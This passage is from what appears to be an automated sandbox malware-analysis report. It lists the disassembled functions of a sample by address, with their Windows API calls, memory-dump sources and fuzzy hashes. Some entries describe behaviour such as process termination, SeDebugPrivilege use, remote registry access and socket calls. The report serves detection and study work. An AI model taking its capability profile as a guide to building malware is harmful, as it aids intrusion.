                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                                                                        • String ID: SysListView32
                                                                                                                                        • API String ID: 307300125-78025650
                                                                                                                                        • Opcode ID: 3f87efa5f3e677224bb526345138beebb2c9fb1c3bb35cadafdd0328ae72378d
                                                                                                                                        • Instruction ID: 2ba794efff85315c74aa1affba6bbdbe14917114600e970fa0ad735262baf19d
                                                                                                                                        • Opcode Fuzzy Hash: 3f87efa5f3e677224bb526345138beebb2c9fb1c3bb35cadafdd0328ae72378d
                                                                                                                                        • Instruction Fuzzy Hash: 30418071900348EFEF219FA4C889FEE77A8EF08350F10452EF659A7291D6799D84CB64
                                                                                                                                        Function 007C1620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007A6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007A6F7D
                                                                                                                                          • Part of subcall function 007A6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 007A6F8D
                                                                                                                                          • Part of subcall function 007A6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 007A7022
                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007C168B
                                                                                                                                        • GetLastError.KERNEL32 ref: 007C169E
                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007C16CA
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 007C1746
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 007C1751
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007C1786
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                                        • Opcode ID: 5fe1748399d28dedc069954cf7c2dcd8488dfe4deb5c47fc4dc05d7804400811
                                                                                                                                        • Instruction ID: b821ad96a9faff42a18b2bd3a3f251e77c456f11c16a16d165690f321b5fe92b
                                                                                                                                        • Opcode Fuzzy Hash: 5fe1748399d28dedc069954cf7c2dcd8488dfe4deb5c47fc4dc05d7804400811
                                                                                                                                        • Instruction Fuzzy Hash: BE41A971600201EFDB15EF54CCE9FADB7A5AF89304F09805CE9069F292DB799900CB41
                                                                                                                                        Function 007A6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 007A62D6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconLoad
                                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                                        • Opcode ID: c4be7e27b371c2e55e19355b35541515519dd03ff3570e00f7f1d58c630e2961
                                                                                                                                        • Instruction ID: 93ec7cfa15d27ee137c2712cbe05ca732cf3d1173641d071e393dc290ad1fcec
                                                                                                                                        • Opcode Fuzzy Hash: c4be7e27b371c2e55e19355b35541515519dd03ff3570e00f7f1d58c630e2961
                                                                                                                                        • Instruction Fuzzy Hash: 68110D72249342FED7015B549C46FAA779CFF67734F140129F601E62C2F7BCAA414268
                                                                                                                                        Function 007A757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 007A7595
                                                                                                                                        • LoadStringW.USER32(00000000), ref: 007A759C
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007A75B2
                                                                                                                                        • LoadStringW.USER32(00000000), ref: 007A75B9
                                                                                                                                        • _wprintf.LIBCMT ref: 007A75DF
                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007A75FD
                                                                                                                                        Strings
                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 007A75DA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                        • API String ID: 3648134473-3128320259
                                                                                                                                        • Opcode ID: 527363d61fc978195c1ffc9ff11f5c5d47429da625f86a995667fb2e84b2c625
                                                                                                                                        • Instruction ID: 993156d69596217108893aa376ab03bf6fed0312426c11c1578935aa1feddbd7
                                                                                                                                        • Opcode Fuzzy Hash: 527363d61fc978195c1ffc9ff11f5c5d47429da625f86a995667fb2e84b2c625
                                                                                                                                        • Instruction Fuzzy Hash: E20162F2900248BFE721A7949CC9EE6776CDB08301F004495B715DA041EA789E848B38
                                                                                                                                        Function 007C2A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                          • Part of subcall function 007C3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2AA6,?,?), ref: 007C3B0E
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C2AE7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3479070676-0
                                                                                                                                        • Opcode ID: b69f8f8c1d8c3d343b1c52d886e56dbeff19cfb2a125bd8e3a178a5b1c201818
                                                                                                                                        • Instruction ID: 85eb803ea1c97c280cd033825620cc190d53efa52b9403874fe6e9ad4b77b1d6
                                                                                                                                        • Opcode Fuzzy Hash: b69f8f8c1d8c3d343b1c52d886e56dbeff19cfb2a125bd8e3a178a5b1c201818
                                                                                                                                        • Instruction Fuzzy Hash: 18913671204201EFCB14EF14C895F6EB7E5AF88314F14881DF9969B2A2DB39ED46CB52
                                                                                                                                        Function 007B9A66 Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • select.WS2_32 ref: 007B9B38
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B9B45
                                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,?), ref: 007B9B6F
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B9B9F
                                                                                                                                        • htons.WS2_32(?), ref: 007B9C51
                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 007B9C0C
                                                                                                                                          • Part of subcall function 0079E0F5: _strlen.LIBCMT ref: 0079E0FF
                                                                                                                                          • Part of subcall function 0079E0F5: _memmove.LIBCMT ref: 0079E121
                                                                                                                                        • _strlen.LIBCMT ref: 007B9CA7
                                                                                                                                        • _memmove.LIBCMT ref: 007B9D10
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3637404534-0
                                                                                                                                        • Opcode ID: 5c2ce0153c3a483cf8fd587f981b28a994c803ed6ca9311aa50cc289a165bf8f
                                                                                                                                        • Instruction ID: 58eef82ba78956e54321441900202f93b2b59d72608361e4330b4434b1c6fc1c
                                                                                                                                        • Opcode Fuzzy Hash: 5c2ce0153c3a483cf8fd587f981b28a994c803ed6ca9311aa50cc289a165bf8f
                                                                                                                                        • Instruction Fuzzy Hash: 4781A371504240EBC714EF64CC59FABB7E8EB84714F10861DFA669B291DB38DD04C7A1
                                                                                                                                        Function 0078B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __mtinitlocknum.LIBCMT ref: 0078B744
                                                                                                                                          • Part of subcall function 00788A0C: __FF_MSGBANNER.LIBCMT ref: 00788A21
                                                                                                                                          • Part of subcall function 00788A0C: __NMSG_WRITE.LIBCMT ref: 00788A28
                                                                                                                                          • Part of subcall function 00788A0C: __malloc_crt.LIBCMT ref: 00788A48
                                                                                                                                        • __lock.LIBCMT ref: 0078B757
                                                                                                                                        • __lock.LIBCMT ref: 0078B7A3
                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00816948,00000018,00796C2B,?,00000000,00000109), ref: 0078B7BF
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0078B7DC
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0078B7EC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1422805418-0
                                                                                                                                        • Opcode ID: 68452cca4f9bcba2e7a37cf54fafb0793505decbae4b27229718ce4016a0f549
                                                                                                                                        • Instruction ID: 834702eb580d4476a7e351d613f233ac4fe7a141fae2366508325359daadaef0
                                                                                                                                        • Opcode Fuzzy Hash: 68452cca4f9bcba2e7a37cf54fafb0793505decbae4b27229718ce4016a0f549
                                                                                                                                        • Instruction Fuzzy Hash: 6241F471980315DBEB20BF68D88836CBBA4BF45335F248219E425AB2D2D77C9941CBD5
                                                                                                                                        Function 007AA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 007AA1CE
                                                                                                                                          • Part of subcall function 0078010A: std::exception::exception.LIBCMT ref: 0078013E
                                                                                                                                          • Part of subcall function 0078010A: __CxxThrowException@8.LIBCMT ref: 00780153
                                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007AA205
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 007AA221
                                                                                                                                        • _memmove.LIBCMT ref: 007AA26F
                                                                                                                                        • _memmove.LIBCMT ref: 007AA28C
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 007AA29B
                                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007AA2B0
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 007AA2CF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 256516436-0
                                                                                                                                        • Opcode ID: 66238d1fcaa62e508b1ea9c252ec9962bf881fddbe0cde56b13165514df56afb
                                                                                                                                        • Instruction ID: bb9f8493407fa0c60157551f304a56496d33659bc674abea23086af40974174c
                                                                                                                                        • Opcode Fuzzy Hash: 66238d1fcaa62e508b1ea9c252ec9962bf881fddbe0cde56b13165514df56afb
                                                                                                                                        • Instruction Fuzzy Hash: D2319431900105EBDF10EFA4DC89AAEB7B8FF89310B1580A5F904AB256DB79DD14CBA5
                                                                                                                                        Function 007C8CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007C8CF3
                                                                                                                                        • GetDC.USER32(00000000), ref: 007C8CFB
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C8D06
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 007C8D12
                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 007C8D4E
                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007C8D5F
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007C8D99
                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007C8DB9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3864802216-0
                                                                                                                                        • Opcode ID: 060c495749dc21004976dc285cda0831d15057b2c13397c7152846ec0c78bb0e
                                                                                                                                        • Instruction ID: 27d62bfe396c547dc0bcf32bb1d69e6980bd65ce42e1d43becc2f9cc10abbc8c
                                                                                                                                        • Opcode Fuzzy Hash: 060c495749dc21004976dc285cda0831d15057b2c13397c7152846ec0c78bb0e
                                                                                                                                        • Instruction Fuzzy Hash: D3315C72201254BBEB208F508C89FEA3BA9EB4D755F048059FE099E291DA799C41CB75
                                                                                                                                        Function 0077B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8cad561eabaa14e4701a9b4d8d2597b0bd227f97ff70f9080c38182af6b6f1ed
                                                                                                                                        • Instruction ID: abb5cf7b25a164fba86bbe730ade07327afe8f7d57486f200c38deeba0f19c5f
                                                                                                                                        • Opcode Fuzzy Hash: 8cad561eabaa14e4701a9b4d8d2597b0bd227f97ff70f9080c38182af6b6f1ed
                                                                                                                                        • Instruction Fuzzy Hash: 4A713871900149EFCF14CF98CC88ABEBB74FF89354F14C159F919AA251C738AA51CBA4
                                                                                                                                        Function 007C2121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007C214B
                                                                                                                                        • _memset.LIBCMT ref: 007C2214
                                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 007C2259
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                          • Part of subcall function 00763BCF: _wcscpy.LIBCMT ref: 00763BF2
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007C2320
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 007C232F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 4082843840-2766056989
                                                                                                                                        • Opcode ID: 04ed053c30a23e249b1176e4dfa3912d60f98e0c57a5c39af3d70b4bf6b0c824
                                                                                                                                        • Instruction ID: f612550a89ef17d3a416cc962f8fb1bf20432ea6b33b9c44e0906682919ec291
                                                                                                                                        • Opcode Fuzzy Hash: 04ed053c30a23e249b1176e4dfa3912d60f98e0c57a5c39af3d70b4bf6b0c824
                                                                                                                                        • Instruction Fuzzy Hash: DD716D75A00619DFCF14EFA4C885AAEBBF5FF48310B10855DE856AB352DB38AD41CB90
                                                                                                                                        Function 007A47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(?), ref: 007A481D
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 007A4832
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 007A4893
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 007A48C1
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 007A48E0
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 007A4926
                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007A4949
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                        • Opcode ID: e21f79c208c071d3f2f26fd28a30f08f516037d2817fbbf87a4f17ede11e44fa
                                                                                                                                        • Instruction ID: 774499a36d5fb5050a619178a94135842c7bed86301f3422a0673a67be73cb3e
                                                                                                                                        • Opcode Fuzzy Hash: e21f79c208c071d3f2f26fd28a30f08f516037d2817fbbf87a4f17ede11e44fa
                                                                                                                                        • Instruction Fuzzy Hash: 1C51E4A06087D13DFB3647348C49BBBBEA95BC7304F088689E1D5468C2C6DEEC94DB61
